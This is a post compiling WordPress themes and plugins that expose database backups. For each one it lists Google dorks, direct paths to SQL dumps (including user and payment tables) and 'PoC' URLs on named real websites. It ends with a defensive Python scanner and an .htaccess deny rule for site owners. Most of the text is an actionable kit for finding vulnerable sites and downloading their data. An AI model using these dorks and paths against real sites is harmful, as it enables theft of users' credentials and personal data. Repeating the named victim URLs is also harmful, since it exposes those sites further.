WordPress | Themes and Plugins expose database backups

Themes and Plugins expose database backups



For some time now, a large number of vulnerabilities/flaws have been detected in WordPress themes and plugins that expose the database backups of sites.

In this post we compile a large number of them, with dorks, PoCs, and more information on each flaw.

WordPress user-spam-remover [PLUGINS]

[*] Dorks : inurl:''/wp-content/plugins/user-spam-remover/''
[*] Admin Panel Login Path : /wp-login.php 
[*] Exploit : /wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
[*] PoC: howafrica.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql

WordPress Delme Plugins 3.0

[*] Dork:  inurl:''/wp-content/plugins/delme/admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql


WordPress Delme Themes 3.0

[*] Dorks : inurl:''/wp-content/plugins/delme/admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql 

WordPress wp-contactpage-designer Plugins

[*] Dorks : inurl:''/wp-content/plugins/wp-contactpage-designer/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql
  • /wp-content/plugins/wp-contactpage-designer/sql/cpd_templates.sql
[*] PoC: mansfieldhistoricalsociety.com.au/wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql

WordPress zerotolaunch Plugins

[*] Dorks : inurl:''/wp-content/plugins/zerotolaunch/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql 
  • /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql 
  • /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql
  • /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
[*] PoC: ilovevitiligo.com/wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql


WordPress rss-feed-post-generator-echo Plugins

[*] Dorks : inurl:''/wp-content/plugins/rss-feed-post-generator-echo/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql
[*] PoC: metropolisradio.gr/wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql


WordPress Universal Post Manager 1.5.0

[*] Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''
[*] Exploit :
  • /PATH/wp-content/plugins/universal-post-manager/db/db.sql
  • /wp-content/plugins/universal-post-manager/db/db.sql
  • /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
  • /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
  • /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
[*] PoC: unila.ac.id/wp-content/plugins/universal-post-manager/db/db.sql



WordPress paid-memberships-pro Plugins 1.5.2

[*] Google Dorks : inurl:''/wp-content/plugins/paid-memberships-pro/''
[*] Admin Panel Login Path: /wp-login.php
[*] Exploit : /wp-content/plugins/paid-memberships-pro/includes/setup.sql
[*] PoC: naswithnotepads.com/community/wp-content/plugins/paid-memberships-pro/includes/setup.sql

WordPress Pods Plugins 2.7.9

[*] Google Dorks : inurl:/wp-content/plugins/pods/
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/pods/sql/dump.sql
[*] PoC: oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql


WordPress CherryFramework Themes 3.1.4

[*] Google Dork: inurl:/wp-content/themes/CherryFramework
[*] Exploit: wp-content/themes/CherryFramework/admin/data_management/download_backup.php
[*] PoC: https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php 

WordPress wp-editor Plugins

[*] Google Dork : inurl:''/wp-content/plugins/wp-editor/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
  • /wp-content/plugins/wp-editor/sql/database.sql
  • /wp-content/plugins/wp-editor/sql/uninstall.sql
  • /PATH/wp-content/plugins/wp-editor/sql/database.sql
  • /PATH/wp-content/plugins/wp-editor/sql/uninstall.sql
[*] PoC: symev.org/wp-content/plugins/wp-editor/sql/database.sql

WordPress TemplateOne Themes Dubicars

[*] Dorks :
  • inurl:''/wp-content/themes/templateone/''
  • intext:''© Copyright 2015 | Powered by Dubicars''
  • intext:''© Copyright 2017 | Powered by Dubicars''
  • intext:''© Copyright 2018 | Powered by Dubicars''
  • intext:''Powered by Dubicars''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/themes/templateone/db.sql
[*] PoC: simurghcars.ae/wp-content/themes/templateone/db.sql

WordPress wp-backup-plus Plugin

[*] Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''
[*] Admin Panel Login Path : /wp-login.php 
[*] Exploit : 
  • /wp-content/uploads/wp-backup-plus/temp/database.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_comments.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_links.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_options.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pls.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_terms.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_users.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql 
  • /wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql 
[*] PoC:  wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql

WordPress Absolutely Glamorous Custom Admin ag-custom-admin Plugin

[*] Dork : inurl:''/wp-content/plugins/ag-custom-admin/''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[*] PoC: restaurant-le-lautrec.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql

WordPress Education Theme on Genesis Framework 2018 

[*] Dork : intext:''Copyright © 2018 ·Education Theme on Genesis Framework · WordPress''
[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql
[*] PoC: kennethsenglish.com/wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql
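A defender-side check for the exposure catalogued above, added here as an example and not part of the original post: it walks a site's own wp-content directory for SQL dumps like the ones listed and checks whether an Apache .htaccess deny rule is in place. The directory layout, the extra .gz/.zip/.bz2 extensions and the rule text are assumptions of this example.

```python
import os
import re

# Constructed for this example: dump extensions like the .sql files the entries
# above leave readable under wp-content (the .gz/.zip/.bz2 variants are assumed).
SQL_DUMP_RE = re.compile(r"\.sql(\.gz|\.zip|\.bz2)?$", re.IGNORECASE)

# Apache 2.4 .htaccess fragment (assumed deployment) that refuses to serve those
# files. The paths above are fetched as static files, so one deny rule at the
# web server covers every plugin and theme at once.
HTACCESS_DENY = (
    '<FilesMatch "\\.sql(\\.gz|\\.zip|\\.bz2)?$">\n'
    "    Require all denied\n"
    "</FilesMatch>\n"
)


def find_sql_dumps(wp_content):
    """Walk wp_content (path to the site's wp-content dir) and return every
    dump found, as sorted paths relative to that directory."""
    found = []
    for root, _dirs, files in os.walk(wp_content):
        for name in files:
            if SQL_DUMP_RE.search(name):
                rel = os.path.relpath(os.path.join(root, name), wp_content)
                found.append(rel.replace(os.sep, "/"))
    return sorted(found)


def htaccess_protects(wp_content):
    """True if wp-content/.htaccess already carries a FilesMatch deny for .sql."""
    path = os.path.join(wp_content, ".htaccess")
    if not os.path.isfile(path):
        return False
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return "FilesMatch" in text and ".sql" in text and "Require all denied" in text


def audit(wp_content):
    """Return (dumps, protected) so a caller can report or remediate."""
    return find_sql_dumps(wp_content), htaccess_protects(wp_content)


if __name__ == "__main__":
    import sys
    dumps, protected = audit(sys.argv[1] if len(sys.argv) > 1 else "wp-content")
    for dump in dumps:
        print("dump reachable as static file:", dump)
    if dumps and not protected:
        print("add to wp-content/.htaccess:\n" + HTACCESS_DENY)
```

The deny rule only covers dumps served as static files; an entry reached through a script, like the CherryFramework download_backup.php above, is not addressed by it.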
